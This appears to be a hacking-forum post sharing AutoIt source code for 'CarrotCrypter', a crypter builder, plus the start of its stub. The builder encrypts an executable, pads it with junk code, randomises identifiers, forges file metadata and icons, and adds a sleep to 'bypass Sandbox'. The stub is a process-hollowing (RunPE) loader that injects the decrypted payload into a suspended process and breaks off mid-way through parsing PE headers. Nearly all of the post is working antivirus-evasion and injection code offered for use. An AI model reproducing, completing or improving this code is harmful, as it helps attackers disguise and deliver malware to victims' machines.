dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,861
- Solutions
- 4
- Reputation
- 32
- Reaction score
- 45,552
- Points
- 1,813
- Credits
- 55,350
7 Years of Service
56%
[HIDE-THANKS]Builder:
Stub:
Junk code:
[/HIDE-THANKS]
Code:
>#include
#include
#include
#include
#include
#include
#include "includes/Junkcode.au3"
#include
#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("CarrotCrypter BETA V.0.1", 642, 506, 192, 124, BitXOR($GUI_SS_DEFAULT_GUI, $WS_MINIMIZEBOX))
GUISetBkColor(0x4c4c4c)
$Pic1 = GUICtrlCreatePic("images/bg.bmp", 0, 0, 641, 97)
$Group1 = GUICtrlCreateGroup("File to encrypt", 360, 136, 273, 185)
DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group1), "wstr", 0, "wstr", 0)
$Input1 = GUICtrlCreateInput("File_Input", 368, 176, 193, 21)
$Input2 = GUICtrlCreateInput("File_Output", 368, 224, 193, 21)
$Button3 = GUICtrlCreateButton("Chose File", 560, 174, 65, 25)
$Button4 = GUICtrlCreateButton("Create File", 560, 222, 65, 25)
$Label1 = GUICtrlCreateLabel("Chose a name for the encrypted file", 368, 205, 250, 17)
$Label2 = GUICtrlCreateLabel("Chose a File to encrypt", 368, 155, 250, 17)
$Input3 = GUICtrlCreateInput("", 368, 288, 257, 21)
$Label3 = GUICtrlCreateLabel("Chose a passphrase to encrypt your file", 368, 268, 250, 17)
GUICtrlCreateGroup("", -99, -99, 1, 1)
$Button1 = GUICtrlCreateButton("License", 480, 104, 113, 33)
$Button2 = GUICtrlCreateButton("?", 600, 104, 33, 33)
$Group2 = GUICtrlCreateGroup("Encryption", 360, 328, 273, 169)
DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group2), "wstr", 0, "wstr", 0)
$Checkbox1 = GUICtrlCreateCheckbox("x64 (Can solve compability problems)", 376, 352, 241, 17)
DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Checkbox1), "wstr", 0, "wstr", 0)
$Checkbox2 = GUICtrlCreateCheckbox("Manual compiling", 376, 384, 241, 17)
DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Checkbox2), "wstr", 0, "wstr", 0)
$Button5 = GUICtrlCreateButton("ENCRYPT MY FILE", 376, 416, 249, 73)
GUICtrlCreateGroup("", -99, -99, 1, 1)
$Group3 = GUICtrlCreateGroup("USG", 8, 104, 337, 393)
DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group3), "wstr", 0, "wstr", 0)
$Group4 = GUICtrlCreateGroup("Custom Stub", 16, 128, 321, 265)
DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group4), "wstr", 0, "wstr", 0)
$Checkbox3 = GUICtrlCreateRadio("Create a custom stub (high security)", 32, 152, 289, 33)
DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Checkbox3), "wstr", 0, "wstr", 0)
$Combo1 = GUICtrlCreateCombo("AES 256", 152, 184, 145, 25, BitOR($CBS_DROPDOWN,$CBS_AUTOHSCROLL))
GUICtrlSetData(-1, "3DES|DES|RC2")
$Combo2 = GUICtrlCreateCombo("0% junk code (speed)", 152, 224, 145, 25, BitOR($CBS_DROPDOWN,$CBS_AUTOHSCROLL))
GUICtrlSetData(-1, "25% junk code (speed)|50% junk code (medium)|75% junk code (security)")
$Label5 = GUICtrlCreateLabel("Encryption mode", 32, 184, 100, 17)
$Label6 = GUICtrlCreateLabel("Junk code generator", 32, 224, 100, 17)
$Group6 = GUICtrlCreateGroup("Icon changer", 24, 264, 305, 121)
DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group6), "wstr", 0, "wstr", 0)
$Input4 = GUICtrlCreateInput(".ico", 32, 328, 201, 21)
$Button7 = GUICtrlCreateButton("Chose Icon", 240, 328, 81, 25)
$Label7 = GUICtrlCreateLabel("Here you can chose a new Icon for your file. Chosing a new Icon increases the security.", 32, 290, 284, 41)
$Button8 = GUICtrlCreateButton("Chose a precreated Icon", 32, 352, 289, 25)
GUICtrlCreateGroup("", -99, -99, 1, 1)
GUICtrlCreateGroup("", -99, -99, 1, 1)
$Group5 = GUICtrlCreateGroup("More oprions", 16, 400, 321, 89)
DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Group5), "wstr", 0, "wstr", 0)
$Label4 = GUICtrlCreateLabel("More Options: external stub, File informations and further security...", 50, 435, 200, 30)
$Button6 = GUICtrlCreateButton("MORE OPTIONS", 232, 424, 97, 49)
GUICtrlCreateGroup("", -99, -99, 1, 1)
GUICtrlCreateGroup("", -99, -99, 1, 1)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
$Informations = GUICreate("More Options", 252, 363, 192, 124, BitXOR($GUI_SS_DEFAULT_GUI, $WS_MINIMIZEBOX))
GUISetBkColor(0x4c4c4c)
$Compile_Info = GUICtrlCreateGroup("File informations", 8, 0, 233, 281)
DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Compile_Info), "wstr", 0, "wstr", 0)
$Check1 = GUICtrlCreateCheckbox("Create custom File informations", 24, 24, 201, 17)
DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Check1), "wstr", 0, "wstr", 0)
$Company = GUICtrlCreateInput("Company", 24, 56, 201, 21)
$Description = GUICtrlCreateInput("Description", 24, 88, 201, 21)
$Version = GUICtrlCreateInput("Version", 24, 120, 201, 21)
$CopyRight = GUICtrlCreateInput("Copyright", 24, 152, 201, 21)
$ProductName = GUICtrlCreateInput("Product Name", 24, 184, 201, 21)
$ProductVersion = GUICtrlCreateInput("Product Version", 24, 216, 201, 21)
$OriginalName = GUICtrlCreateInput("Original Executable Name", 24, 248, 201, 21)
GUICtrlCreateGroup("", -99, -99, 1, 1)
$lab2 = GUICtrlCreateButton("Random File informations", 8, 296, 233, 25)
$Check3 = GUICtrlCreateCheckbox("Create Delay to bypass Sandbox", 8, 328, 233, 25)
DllCall("UxTheme.dll", "int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($Check3), "wstr", 0, "wstr", 0)
GUISetState(@SW_HIDE)
;STYLLEE
GUICtrlSetState($Combo1,$GUI_DISABLE)
GUICtrlSetState($Combo2,$GUI_DISABLE)
GUICtrlSetState($Input4,$GUI_DISABLE)
GUICtrlSetState($Button7,$GUI_DISABLE)
GUICtrlSetState($Button8,$GUI_DISABLE)
GUICtrlSetState($Company,$GUI_DISABLE)
GUICtrlSetState($Description,$GUI_DISABLE)
GUICtrlSetState($Version,$GUI_DISABLE)
GUICtrlSetState($CopyRight,$GUI_DISABLE)
GUICtrlSetState($ProductName,$GUI_DISABLE)
GUICtrlSetState($ProductVersion,$GUI_DISABLE)
GUICtrlSetState($OriginalName,$GUI_DISABLE)
GUICtrlSetBkColor($Button1, 0xe6830e)
GUICtrlSetColor($Button1, 0xffffff)
GUICtrlSetBkColor($Button2, 0xe6830e)
GUICtrlSetColor($Button2, 0xffffff)
GUICtrlSetBkColor($Button3, 0xe6830e)
GUICtrlSetColor($Button3, 0xffffff)
GUICtrlSetBkColor($Button4, 0xe6830e)
GUICtrlSetColor($Button4, 0xffffff)
GUICtrlSetBkColor($Button5, 0xe6830e)
GUICtrlSetColor($Button5, 0xffffff)
GUICtrlSetBkColor($Button6, 0xe6830e)
GUICtrlSetColor($Button6, 0xffffff)
GUICtrlSetBkColor($Button7, 0xe6830e)
GUICtrlSetColor($Button7, 0xffffff)
GUICtrlSetBkColor($Button8, 0xe6830e)
GUICtrlSetColor($Button8, 0xffffff)
GUICtrlSetColor($label1, 0xffffff)
GUICtrlSetColor($label2, 0xffffff)
GUICtrlSetColor($label3, 0xffffff)
GUICtrlSetColor($label4, 0xffffff)
GUICtrlSetColor($label5, 0xffffff)
GUICtrlSetColor($label6, 0xffffff)
GUICtrlSetColor($label7, 0xffffff)
GUICtrlSetColor($Group1, 0xffffff)
GUICtrlSetColor($Group2, 0xffffff)
GUICtrlSetColor($Group3, 0xffffff)
GUICtrlSetColor($Group4, 0xffffff)
GUICtrlSetColor($Group5, 0xffffff)
GUICtrlSetColor($Group6, 0xffffff)
GUICtrlSetColor($Compile_Info, 0xffffff)
GUICtrlSetColor($Checkbox1, 0xffffff)
GUICtrlSetColor($Checkbox2, 0xffffff)
GUICtrlSetColor($Checkbox3, 0xffffff)
GUICtrlSetColor($Check1, 0xffffff)
GUICtrlSetColor($lab2, 0xffffff)
GUICtrlSetBkColor($lab2, 0xe6830e)
GUICtrlSetColor($Check3, 0xffffff)
$pwd = ""
Dim $aSpace[3]
$digits = 15
For $i = 1 To $digits
$aSpace[0] = Chr(Random(65, 90, 1)) ;A-Z
$aSpace[1] = Chr(Random(97, 122, 1)) ;a-z
$aSpace[2] = Chr(Random(48, 57, 1)) ;0-9
$pwd &= $aSpace[Random(0, 2, 1)]
Next
GUICtrlSetData($Input3, $pwd)
;ENDSTYYKLE
$Includes = '#include "' & @ScriptDir & '\includes\crypt.au3"' & @CRLF
$Delay = ""
FileChangeDir(@ScriptDir)
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Button6
GUISetState(@SW_SHOW, $Informations)
While 1
Switch GUIGetMsg()
Case $GUI_EVENT_CLOSE
GUISetState(@SW_HIDE, $Informations)
ExitLoop
Case $Check1
If GUICtrlRead($Check1) = $GUI_CHECKED Then
GUICtrlSetState($Company,$GUI_ENABLE)
GUICtrlSetState($Description,$GUI_ENABLE)
GUICtrlSetState($Version,$GUI_ENABLE)
GUICtrlSetState($CopyRight,$GUI_ENABLE)
GUICtrlSetState($ProductName,$GUI_ENABLE)
GUICtrlSetState($ProductVersion,$GUI_ENABLE)
GUICtrlSetState($OriginalName,$GUI_ENABLE)
Else
GUICtrlSetState($Company,$GUI_DISABLE)
GUICtrlSetState($Description,$GUI_DISABLE)
GUICtrlSetState($Version,$GUI_DISABLE)
GUICtrlSetState($CopyRight,$GUI_DISABLE)
GUICtrlSetState($ProductName,$GUI_DISABLE)
GUICtrlSetState($ProductVersion,$GUI_DISABLE)
GUICtrlSetState($OriginalName,$GUI_DISABLE)
EndIf
Case $Check3
$Delay = "sleep(45000)" & @CRLF
Case $lab2
$YEAH = _RandomString()
$YEAH1 = _RandomString()
$YEAH2 = _RandomVersion()
$YEAH3 = _RandomString()
$YEAH4 = _RandomString()
$YEAH5 = _RandomVersion()
$YEAH6 = _RandomString()
GUICtrlSetData($Company, $YEAH)
GUICtrlSetData($Description, $YEAH1)
GUICtrlSetData($Version, $YEAH2)
GUICtrlSetData($CopyRight, $YEAH3)
GUICtrlSetData($ProductName, $YEAH4)
GUICtrlSetData($ProductVersion, $YEAH5)
GUICtrlSetData($OriginalName, $YEAH6)
EndSwitch
WEnd
Case $Button3
$SourceFile = FileOpenDialog("C:/",@ScriptDir&'\',"Executables (*.exe*)",9)
GUICtrlSetData($Input1, $SourceFile)
Case $Button4
$DestinationFile = FileSaveDialog("C:/",@ScriptDir&'\',"Executables (*.exe*)",9)
GUICtrlSetData($Input2, $DestinationFile)
Case $Button7
$Icon = FileOpenDialog("C:/",@ScriptDir&'\',"Icons (*.ico*)",9)
GUICtrlSetData($Input4, $Icon)
Case $Button8
$Icon = FileOpenDialog("C:/",@ScriptDir&'\icons\',"Icons (*.ico*)",9)
GUICtrlSetData($Input4, $Icon)
Case $Button5
;errors
If GUICtrlRead($Input1) == "File_Input" Then
msgbox(0, "Error", "Please chose a File to encrypt")
Endif
;fin errors
Switch GUICtrlRead($Combo1)
Case "3DES"
$algo = $CALG_3DES
Case "DES"
$algo = $CALG_DES
Case "RC2"
$algo = $CALG_RC2
Case "AES 256"
$algo = $CALG_AES_256
EndSwitch
Switch GUICtrlRead($Combo2)
Case "0% junk code (speed)"
$Junk = @CRLF & _JunkCreate(0) & @CRLF
$Junk1 = @CRLF & _JunkCreate(0) & @CRLF
$Junk2 = @CRLF & _JunkCreate(0) & @CRLF
Case "25% junk code (speed)"
$Junk = @CRLF & _JunkCreate(50) & @CRLF
$Junk1 = @CRLF & _JunkCreate(50) & @CRLF
$Junk2 = @CRLF & _JunkCreate(50) & @CRLF
Case "50% junk code (medium)"
$Junk = @CRLF & _JunkCreate(100) & @CRLF
$Junk1 = @CRLF & _JunkCreate(100) & @CRLF
$Junk2 = @CRLF & _JunkCreate(100) & @CRLF
Case "75% junk code (security)"
$Junk = @CRLF & _JunkCreate(150) & @CRLF
$Junk1 = @CRLF & _JunkCreate(150) & @CRLF
$Junk2 = @CRLF & _JunkCreate(150) & @CRLF
Endswitch
$sSourceRead = GUICtrlRead($Input1)
$sDestinationRead = GUICtrlRead($Input2)
$sPasswordRead = GUICtrlRead($Input3)
$Company = GUICtrlRead($Company)
$Description = GUICtrlRead($Description)
$Version = GUICtrlRead($Version)
$CopyRight = GUICtrlRead($CopyRight)
$ProductName = GUICtrlRead($ProductName)
$ProductVersion = GUICtrlRead($ProductVersion)
$OriginalName = GUICtrlRead($OriginalName)
$pragma = "#pragma compile(CompanyName, " & $Company & ")" & @CRLF & "#pragma compile(FileDescription, " & $Description & ")" & @CRLF & "#pragma compile(FileVersion, " & $Version & ")" & @CRLF & "#pragma compile(LegalCopyright, " & $Copyright & ")" & @CRLF & "#pragma compile(OriginalFilename, " & $OriginalName & ".exe )" & @CRLF & "#pragma compile(ProductName, " & $ProductName & ")" & @CRLF & "#pragma compile(ProductVersion, " & $ProductVersion & ")" & @CRLF
$sIcon = GUICtrlRead($Input4)
$BIN = _Binary($sSourceRead)
FileChangeDir(@ScriptDir)
;---------------------CUSTOM STUB VARIABLES------------------------------
$r1 = _RandomStringForRandomStub()
;Generate Random Variables
$nRvar = 1
Dim $rV[100]
while $nRvar $rV[$nRvar] = "$" & _RandomStringForRandomStub()
$nRvar = $nRvar + 1
Wend
;Create the new stub
$Stub = FileOpen("includes/AZERR.au3")
$Content = FileRead($Stub)
FileClose($Stub)
;File changes : string modification
$MainFunc = StringReplace($Content, "$bBinaryImage", $rV[1])
$MainFunc1 = StringReplace($MainFunc, "_AZERR", $r1)
$MainFunc2 = StringReplace($MainFunc1, "$sCommandLine", $rV[2])
$MainFunc3 = StringReplace($MainFunc2, "$sExeModule", $rV[3])
$MainFunc4 = StringReplace($MainFunc3, "$fAutoItX64", $rV[4])
$MainFunc5 = StringReplace($MainFunc4, "$bBinary", $rV[5])
$MainFunc6 = StringReplace($MainFunc5, "$tBinary", $rV[6])
$MainFunc7 = StringReplace($MainFunc6, "$iNewPID", $rV[7])
$MainFunc8 = StringReplace($MainFunc7, "$pPointer", $rV[8])
$MainFunc9 = StringReplace($MainFunc8, "$tSTARTUPINFO", $rV[9])
$MainFunc10 = StringReplace($MainFunc9, "$tPROCESS_INFORMATION", $rV[10])
$MainFunc11 = StringReplace($MainFunc10, "$aCall", $rV[11])
$MainFunc12 = StringReplace($MainFunc11, "$hProcess", $rV[12])
$MainFunc13 = StringReplace($MainFunc12, "$hThread", $rV[13])
$MainFunc14 = StringReplace($MainFunc13, "$iRunFlag", $rV[14])
$MainFunc15 = StringReplace($MainFunc14, "$tCONTEXT", $rV[15])
$MainFunc16 = StringReplace($MainFunc15, "$CONTEXT_FULL", $rV[16])
$MainFunc17 = StringReplace($MainFunc16, "$pPEB", $rV[17])
Func _RandomStringForRandomStub()
$rString = ""
Dim $aRr[2]
$digits = Random(10, 15, 1)
For $i = 1 To $digits
$aRr[0] = Chr(Random(65, 90, 1))
$aRr[1] = Chr(Random(97, 122, 1))
$rString &= $aRr[Random(0, 1, 1)]
Next
Return $rString
EndFunc
;-----------------------------------------------------------------------------------------
$RUN = @CRLF & $r1 & '($SDER)' & @CRLF
$encryptedpass = @CRLF & "$SDER = _Crypt_DecryptData($bBinary, '" & $sPasswordRead & "', " & $algo & ")"
If GUICtrlRead($Check1) = $GUI_CHECKED Then
FileWrite($sDestinationRead & ".au3", $pragma & $Delay & $Includes & $Junk & $MainFunc17 & @CRLF & $BIN & $Junk1 & $encryptedpass & $Junk2 & $RUN)
Else
FileWrite($sDestinationRead & ".au3", $Delay & $Includes & $Junk & $MainFunc17 & @CRLF & $BIN & $Junk1 & $encryptedpass & $Junk2 & $RUN)
EndIf
If FileExists($sDestinationRead & ".au3") = 1 Then
If GUICtrlRead($Input4) == ".ico" Then
If GUICtrlRead($Checkbox1) = $GUI_CHECKED Then
Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /x64")
Else
Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /x86")
Endif
Else
If GUICtrlRead($Checkbox1) = $GUI_CHECKED Then
Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /icon " & $sIcon & " /x64")
Else
Run("Aut2exe.exe /in " & $sDestinationRead & ".au3 /out " & $sDestinationRead & ".exe /icon " & $sIcon & " /x86")
Endif
EndIf
sleep(200)
If GUICtrlRead($Checkbox2) = $GUI_CHECKED Then
FileDelete($sDestinationRead & ".exe")
Else
FileDelete($sDestinationRead & ".au3")
Endif
msgbox(0, "Encryption finished", "You can now distribute your file with security")
EndIf
Case $Button2
msgbox(0, "Informations - Carrotcrypter", "Help" & @CRLF & " -Contact our customer team at Carrotnet.cf" & @CRLF & "Informations" & @CRLF & " -Created by Carrotinblack" & @CRLF & " -2017 copyright Thecarrotnet ©")
Case $Checkbox3
GUICtrlSetState($Combo1,$GUI_ENABLE)
GUICtrlSetState($Combo2,$GUI_ENABLE)
GUICtrlSetState($Input4,$GUI_ENABLE)
GUICtrlSetState($Button7,$GUI_ENABLE)
GUICtrlSetState($Button8,$GUI_ENABLE)
EndSwitch
WEnd
Func _Binary($FTOB)
Local $hModule = FileOpen($FTOB, 16)
If [MENTION=8708]error[/MENTION] Then Exit
Global $bBinary = FileRead($hModule)
FileClose($hModule)
$bBinary = _Crypt_EncryptData($bBinary, $sPasswordRead, $algo)
Local Const $MAX_LINESIZE = 4095
Local $iNewLine, $j
Local $iChinkSize = 32
Local $sBinary
For $i = 1 To BinaryLen($bBinary) Step $iChinkSize
$j += 1
If 4*($j * $iChinkSize) > $MAX_LINESIZE - 129 Then
$iNewLine = 1
EndIf
If $iNewLine Then
$iNewLine = 0
$j = 0
$sBinary = StringTrimRight($sBinary, 5)
$sBinary &= @CRLF & '$bBinary &= "' & StringTrimLeft(BinaryMid($bBinary, $i, $iChinkSize), 2) & '" & _' & @CRLF
ContinueLoop
EndIf
If $i = 1 Then
$sBinary &= '$bBinary = "' & BinaryMid($bBinary, $i, $iChinkSize) & '" & _' & @CRLF
Else
$sBinary &= ' "' & StringTrimLeft(BinaryMid($bBinary, $i, $iChinkSize), 2) & '" & _' & @CRLF
EndIf
Next
$sBinary = StringTrimRight($sBinary, 5)
Return $sBinary
Endfunc
Code:
>Global $iNewPID
Func _AZERR($bBinaryImage, $sCommandLine = "", $sExeModule = @AutoItExe)
#Region 1. DETERMINE INTERPRETER TYPE
Local $fAutoItX64 = @AutoItX64
#Region 2. PREDPROCESSING PASSED
Local $bBinary = Binary($bBinaryImage) ; this is redundant but still...
; Make structure out of binary data that was passed
Local $tBinary = DllStructCreate("byte[" & BinaryLen($bBinary) & "]")
DllStructSetData($tBinary, 1, $bBinary) ; fill it
; Get pointer to it
Local $pPointer = DllStructGetPtr($tBinary)
#Region 3. CREATING NEW PROCESS
; STARTUPINFO structure (actually all that really matters is allocated space)
Local $tSTARTUPINFO = DllStructCreate("dword cbSize;" & _
"ptr Reserved;" & _
"ptr Desktop;" & _
"ptr Title;" & _
"dword X;" & _
"dword Y;" & _
"dword XSize;" & _
"dword YSize;" & _
"dword XCountChars;" & _
"dword YCountChars;" & _
"dword FillAttribute;" & _
"dword Flags;" & _
"word ShowWindow;" & _
"word Reserved2;" & _
"ptr Reserved2;" & _
"ptr hStdInput;" & _
"ptr hStdOutput;" & _
"ptr hStdError")
; This is much important. This structure will hold very some important data.
Local $tPROCESS_INFORMATION = DllStructCreate("ptr Process;" & _
"ptr Thread;" & _
"dword ProcessId;" & _
"dword ThreadId")
; Create new process
Local $aCall = DllCall("kernel32.dll", "bool", "CreateProcessW", _
"wstr", $sExeModule, _
"wstr", $sCommandLine, _
"ptr", 0, _
"ptr", 0, _
"int", 0, _
"dword", 4, _ ; CREATE_SUSPENDED ; "ptr", 0, _
"ptr", 0, _
"ptr", DllStructGetPtr($tSTARTUPINFO), _
"ptr", DllStructGetPtr($tPROCESS_INFORMATION))
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $aCall[0] Then Return SetError(1, 0, 0) ; CreateProcess function or call to it failed
; Get new process and thread handles:
Local $hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process")
Local $hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread")
; Check for 'wrong' bit-ness. Not because it could't be implemented, but besause it would be uglyer (structures)
If $fAutoItX64 And _RunBinary_IsWow64Process($hProcess) Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(2, 0, 0)
EndIf
#Region 4. FILL CONTEXT STRUCTURE
; CONTEXT structure is what's really important here. It's processor specific.
Local $iRunFlag, $tCONTEXT
If $fAutoItX64 Then
If @OSArch = "X64" Then
$iRunFlag = 2
$tCONTEXT = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;" & _ ; Register parameter home addresses
"dword ContextFlags; dword MxCsr;" & _ ; Control flags
"word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;" & _ ; Segment Registers and processor flags
"uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;" & _ ; Debug registers
"uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;" & _ ; Integer registers
"uint64 Rip;" & _ ; Program counter
"uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];" & _ ; Floating point state (types are not correct for simplicity reasons!!!)
"uint64 VectorRegister[52]; uint64 VectorControl;" & _ ; Vector registers (type for VectorRegister is not correct for simplicity reasons!!!)
"uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip") ; Special debug control registers
Else
$iRunFlag = 3
; FIXME - Itanium architecture
; Return special error number:
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(102, 0, 0)
EndIf
Else
$iRunFlag = 1
$tCONTEXT = DllStructCreate("dword ContextFlags;" & _ ; Control flags
"dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;" & _ ; CONTEXT_DEBUG_REGISTERS
"dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;" & _ ; CONTEXT_FLOATING_POINT
"dword SegGs; dword SegFs; dword SegEs; dword SegDs;" & _ ; CONTEXT_SEGMENTS
"dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;" & _ ; CONTEXT_INTEGER
"dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;" & _ ; CONTEXT_CONTROL
"byte ExtendedRegisters[512]") ; CONTEXT_EXTENDED_REGISTERS
EndIf
; Define CONTEXT_FULL
Local $CONTEXT_FULL
Switch $iRunFlag
Case 1
$CONTEXT_FULL = 0x10007
Case 2
$CONTEXT_FULL = 0x100007
Case 3
$CONTEXT_FULL = 0x80027
EndSwitch
; Set desired access
DllStructSetData($tCONTEXT, "ContextFlags", $CONTEXT_FULL)
; Fill CONTEXT structure:
$aCall = DllCall("kernel32.dll", "bool", "GetThreadContext", _
"handle", $hThread, _
"ptr", DllStructGetPtr($tCONTEXT))
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $aCall[0] Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(3, 0, 0) ; GetThreadContext function or call to it failed
EndIf
; Pointer to PEB structure
Local $pPEB
Switch $iRunFlag
Case 1
$pPEB = DllStructGetData($tCONTEXT, "Ebx")
Case 2
$pPEB = DllStructGetData($tCONTEXT, "Rdx")
Case 3
; NEVER BE - Itanium architecture
EndSwitch
#Region 5. READ PE-FORMAT
; Start processing passed binary data. 'Reading' PE format follows.
; First is IMAGE_DOS_HEADER
Local $tIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & _
"word BytesOnLastPage;" & _
"word Pages;" & _
"word Relocations;" & _
"word SizeofHeader;" & _
"word MinimumExtra;" & _
"word MaximumExtra;" & _
"word SS;" & _
"word SP;" & _
"word Checksum;" & _
"word IP;" & _
"word CS;" & _
"word Relocation;" & _
"word Overlay;" & _
"char Reserved[8];" & _
"word OEMIdentifier;" & _
"word OEMInformation;" & _
"char Reserved2[20];" & _
"dword AddressOfNewExeHeader", _
$pPointer)
; Save this pointer value (it's starting address of binary image headers)
Local $pHEADERS_NEW = $pPointer
; Move pointer
$pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader") ; move to PE file header
; Get "Magic"
Local $sMagic = DllStructGetData($tIMAGE_DOS_HEADER, "Magic")
; Check if it's valid format
If Not ($sMagic == "MZ") Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(4, 0, 0) ; MS-DOS header missing.
EndIf
; In place of IMAGE_NT_SIGNATURE
Local $tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer)
; Move pointer
$pPointer += 4 ; size of $tIMAGE_NT_SIGNATURE structure
; Check signature
If DllStructGetData($tIMAGE_NT_SIGNATURE, "Signature") 17744 Then ; IMAGE_NT_SIGNATURE
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(5, 0, 0) ; wrong signature. For PE image should be "PE\0\0" or 17744 dword.
EndIf
; In place of IMAGE_FILE_HEADER
Local $tIMAGE_FILE_HEADER = DllStructCreate("word Machine;" & _
"word NumberOfSections;" & _
"dword TimeDateStamp;" & _
"dword PointerToSymbolTable;" & _
"dword NumberOfSymbols;" & _
"word SizeOfOptionalHeader;" & _
"word Characteristics", _
$pPointer)
; I could check here if the module is relocatable
; Local $fRelocatable
; If BitAND(DllStructGetData($tIMAGE_FILE_HEADER, "Characteristics"), 1) Then $fRelocatable = False
; But I won't (will check data in IMAGE_DIRECTORY_ENTRY_BASERELOC instead)
; Get number of sections
Local $iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections")
; Move pointer
$pPointer += 20 ; size of $tIMAGE_FILE_HEADER structure
; In place of IMAGE_OPTIONAL_HEADER
Local $tMagic = DllStructCreate("word Magic;", $pPointer)
Local $iMagic = DllStructGetData($tMagic, 1)
Local $tIMAGE_OPTIONAL_HEADER
If $iMagic = 267 Then ; x86 version
If $fAutoItX64 Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(6, 0, 0) ; incompatible versions
EndIf
$tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;" & _
"byte MajorLinkerVersion;" & _
"byte MinorLinkerVersion;" & _
"dword SizeOfCode;" & _
"dword SizeOfInitializedData;" & _
"dword SizeOfUninitializedData;" & _
"dword AddressOfEntryPoint;" & _
"dword BaseOfCode;" & _
"dword BaseOfData;" & _
"dword ImageBase;" & _
"dword SectionAlignment;" & _
"dword FileAlignment;" & _
"word MajorOperatingSystemVersion;" & _
"word MinorOperatingSystemVersion;" & _
"word MajorImageVersion;" & _
"word MinorImageVersion;" & _
"word MajorSubsystemVersion;" & _
"word MinorSubsystemVersion;" & _
"dword Win32VersionValue;" & _
"dword SizeOfImage;" & _
"dword SizeOfHeaders;" & _
"dword CheckSum;" & _
"word Subsystem;" & _
"word DllCharacteristics;" & _
"dword SizeOfStackReserve;" & _
"dword SizeOfStackCommit;" & _
"dword SizeOfHeapReserve;" & _
"dword SizeOfHeapCommit;" & _
"dword LoaderFlags;" & _
"dword NumberOfRvaAndSizes", _
$pPointer)
; Move pointer
$pPointer += 96 ; size of $tIMAGE_OPTIONAL_HEADER
ElseIf $iMagic = 523 Then ; x64 version
If Not $fAutoItX64 Then
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
Return SetError(6, 0, 0) ; incompatible versions
EndIf
$tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;" & _
"byte MajorLinkerVersion;" & _
"byte MinorLinkerVersion;" & _
"dword SizeOfCode;" & _
"dword SizeOfInitializedData;" & _
"dword SizeOfUninitializedData;" & _
"dword AddressOfEntryPoint;" & _
"dword BaseOfCode;" & _
